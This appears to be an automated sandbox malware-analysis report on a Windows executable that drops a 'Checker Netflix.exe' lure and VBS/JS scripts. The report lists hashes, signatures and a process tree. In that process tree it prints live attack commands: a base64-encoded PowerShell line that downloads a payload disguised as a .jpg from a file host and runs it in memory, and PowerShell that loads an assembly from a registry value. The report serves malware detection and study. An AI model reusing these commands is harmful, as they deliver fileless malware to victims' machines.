Analysis
-
max time kernel
4s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
25-05-2022 00:29
Static task
static1
Behavioral task
behavioral1
Sample
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Resource
win7-20220414-en
General
-
Target
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
-
Size
1.7MB
-
MD5
98bfaca19a9ae44bb60fbc3e98e54d09
-
SHA1
e2f100fc3eb808fe26cdc26327920293c1272cab
-
SHA256
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3
-
SHA512
d8b5abdb9692f54a512d53589537bb8b4aa489443ef7ae77aede69d5c1510a32ce2508eeca1ff50898fb2305151c53b9f03449dac9a75b4ea8aa370a324f4fbe
Malware Config
Extracted
https://6.top4top.net/p_13529t6r71.jpg
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Checker Netflix.exepid process 964 Checker Netflix.exe -
Loads dropped DLL 1 IoCs
Processes:
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exepid process 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exeWScript.exedescription pid process target process PID 880 wrote to memory of 964 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe Checker Netflix.exe PID 880 wrote to memory of 964 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe Checker Netflix.exe PID 880 wrote to memory of 964 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe Checker Netflix.exe PID 880 wrote to memory of 964 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe Checker Netflix.exe PID 880 wrote to memory of 1516 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1516 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1516 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1516 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1636 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1636 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1636 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1636 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1400 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1400 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1400 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 880 wrote to memory of 1400 880 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 1636 wrote to memory of 1588 1636 WScript.exe powershell.exe PID 1636 wrote to memory of 1588 1636 WScript.exe powershell.exe PID 1636 wrote to memory of 1588 1636 WScript.exe powershell.exe PID 1636 wrote to memory of 1588 1636 WScript.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"2⤵PID:1400
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)3⤵PID:1508
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"2⤵
- Suspicious use of WriteProcessMemory
PID:1636
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"2⤵PID:1516
-
-
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"2⤵
- Executes dropped EXE
PID:964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==1⤵PID:1588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)1⤵PID:1772
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
MD5068068c3cefb4c8d997271897c3173bb
SHA1d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
SHA25623d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
SHA5120b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a
-
Filesize
1.5MB
MD5068068c3cefb4c8d997271897c3173bb
SHA1d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
SHA25623d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
SHA5120b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5a65c23a0b2c19e4cc65cae332397d73e
SHA1fa93da00b09e1c68f771f481d725f01a03913ee6
SHA256b96823ee539c570ed2ab01d02aefe7cbd56b31d6ec4379e2971ff6131de5e77a
SHA512c71054f895c30d357ce9a636d957235b46ce6afcd7c6bd23ee2ac7aa08d5493b55cfe077553242be06464fbe7eff6113c37ac764f82b5c5a3913ab2c072c1b64
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5a65c23a0b2c19e4cc65cae332397d73e
SHA1fa93da00b09e1c68f771f481d725f01a03913ee6
SHA256b96823ee539c570ed2ab01d02aefe7cbd56b31d6ec4379e2971ff6131de5e77a
SHA512c71054f895c30d357ce9a636d957235b46ce6afcd7c6bd23ee2ac7aa08d5493b55cfe077553242be06464fbe7eff6113c37ac764f82b5c5a3913ab2c072c1b64
-
Filesize
129KB
MD5c78f607c916f060d6ee3bf391e303acc
SHA11575998cda060d4a570ba258abc12044601da283
SHA256f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4
SHA512cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b
-
Filesize
2KB
MD540b65baa1541784dd92f5aa8ae11b0ef
SHA10772c95f56a025704c01389f2d1108a17fb987cf
SHA2569609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699
SHA512fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2
-
Filesize
87KB
MD50494f414da149631c3d59861865dad37
SHA1c9fd335759efb52e58acb974af27cdecb35d0f10
SHA256a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56
SHA512a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333
-
Filesize
1.5MB
MD5068068c3cefb4c8d997271897c3173bb
SHA1d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
SHA25623d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
SHA5120b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a